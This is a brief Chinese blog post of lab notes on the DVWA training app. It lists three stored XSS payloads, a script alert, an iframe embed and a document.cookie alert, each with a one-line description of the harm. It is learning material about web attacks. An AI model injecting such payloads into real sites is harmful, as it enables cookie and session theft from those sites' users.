dvwa笔记 发表于 2016-02-04 | 分类于 网络安全 | | 阅读次数 存储型XSS1. 基本的xss1<script>alert("hello")</script> 危害: 攻击者可以轻松的以中间人身份捕获 cookie/session。 2. iframe xss1<iframe src="http://www.baidu.com></iframe> 危害:攻击者可以在其中嵌入自己的恶意网页 3. cookie xss1<script>alert(document.cookie);</script> 危害:获取cookie等重要信息